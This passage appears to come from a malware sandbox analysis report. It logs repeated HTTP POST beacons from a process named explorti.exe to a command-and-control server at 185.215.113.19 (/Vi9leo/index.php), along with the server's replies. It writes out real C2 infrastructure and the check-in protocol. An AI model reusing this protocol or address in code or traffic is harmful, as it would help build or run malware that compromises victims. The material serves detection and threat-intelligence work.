Jul 27, 2024 04:50:40.757057905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:40.878149033 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:41.644464970 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:41.645195961 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:41.914510012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:42.034627914 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:42.804121017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:42.808197021 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:43.060408115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:43.176549911 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:43.935173035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:43.935995102 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:44.186075926 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49771	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:44.299891949 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:45.079643965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:45.080440044 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:45.329581976 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49772	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:45.441207886 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:46.192342997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:46.193573952 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:46.438730955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49773	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:46.553464890 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:47.304943085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:47.305859089 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:47.554101944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49774	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:47.676357031 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:48.426654100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:48.427496910 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:48.675595045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49775	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:48.784368038 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:49.528613091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:49.529280901 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:49.776102066 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49776	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:49.895255089 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:50.670846939 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:50.671587944 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:50.924276114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49777	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:51.035098076 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:51.786101103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:51.786725998 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:52.032802105 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49778	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:52.152342081 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:52.923271894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:52.927042007 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:53.174309015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:53.284689903 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:54.031687021 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:54.032618999 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:54.279365063 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:54.394608974 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:55.173336983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
